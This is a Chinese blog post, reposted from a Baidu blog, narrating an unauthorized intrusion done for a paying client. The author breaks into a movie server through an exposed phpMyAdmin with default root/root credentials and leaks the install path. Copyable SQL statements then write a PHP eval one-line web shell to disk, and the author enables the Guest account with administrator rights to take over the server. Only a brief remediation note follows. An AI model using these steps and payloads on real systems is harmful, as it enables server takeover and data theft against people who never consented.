关于PHPMYADMIN的入侵提权拿服务器
转自:http://hi.baidu.com/0o1znz1ow/item/651d3bddbd9b7cf03cc2cb1e作者不详关于PHPMYADMIN的入侵提权拿服务器1.今天收到客户一个单子,说是要黑一台电影服务器,然后给了我IP 61.147.*.*打开网站一看,发现是用FLEAPHP写的一个程序因为刚好在研究FLEAPHP开源开发系统,大致了
转自:http://hi.baidu.com/0o1znz1ow/item/651d3bddbd9b7cf03cc2cb1e
作者不详
关于PHPMYADMIN的入侵提权拿服务器
1.今天收到客户一个单子,说是要黑一台电影服务器,然后给了我IP 61.147.*.*
打开网站一看,发现是用FLEAPHP写的一个程序
因为刚好在研究FLEAPHP开源开发系统,大致了解一些语法,可是没有能利用的,而且整个服务器也只有这么一个网站
2.FleaPHP 为开发者轻松、快捷的创建应用程序提供帮助。FleaPHP 框架简单、清晰,容易理解和学习,并且有完全中文化的文档和丰富的示
例程序降低学习成本。
使用 FleaPHP 框架开发的应用程序能够自动适应各种运行环境,并兼容 PHP4 和 PHP5。
3.既然是PHP那肯定有PHPMYADMIN,尝试着在网站地址后 加入 61.147.*.*/phpmyadmin
哈哈,能直接打开,这时候,就差用户名和密码了
因为事先在看网站的时候,我直接在网站地址后加了个 61.147.*.*/ROOT
没想到能查看他的目录,所以,我在 PHPMYADMIN里面就用默认用户
ROOT ROOT
成功登陆
发现他有三个数据库。。这时候就要利用到 PHPMYADMIN的入侵了
4.首先 打开phpmyadmin
http://61.147.*.*/phpmyadmin/libraries/select_lang.lib.php 得到物理路径.
就是在PHPMYADMIN后面加 libraries/select_lang.lib.php
得到他的路径 C:APMhtdocsphpMyAdminlibraries
这个一定要记录下来
然后 进入PHPMYADMIN
用默认用户进去
运行 SQL语句
Create TABLE a (cmd text NOT NULL);
Insert INTO a (cmd) VALUES("<?php eval($_POST[1]);?>");
select cmd from a into outfile "C:/APM/htdocs/phpMyAdmin/libraries/d.php";
Drop TABLE IF EXISTS a;
语句详细意思
创建一个A表 写入 <?php eval($_POST[1]);?>
熟悉这个的都知道 <?php eval($_POST[1]);?>这个就是一句话了
1是密码 可以自行修改
把里面的信息输出到 phpMyAdmin/libraries/d.php
这个文件
d.php 名字也可以自己入
Drop TABLE IF EXISTS a 如果有 A表 将删除
然后执行
OK 写入成功
这个时候用一句话连接
传上SHELL
进去 一查 原来是个WIN系统
开启GUEST 给予管理权限
服务器成功到手
1.5T的电影 呵呵
此方法一是爆出了路径 二是管理员大意 没有修改默认密码
所以
漏洞详细解决方法:
就是修改管理员密码
这样 可以阻止黑客进入PHPMYADMIN进行SQL运行
当然 IDC商也要禁止客户商的一些权限
这样就可以保证了
开放原子开发者工作坊旨在鼓励更多人参与开源活动,与志同道合的开发者们相互交流开发经验、分享开发心得、获取前沿技术趋势。工作坊有多种形式的开发者活动,如meetup、训练营等,主打技术交流,干货满满,真诚地邀请各位开发者共同参与!
更多推荐
所有评论(0)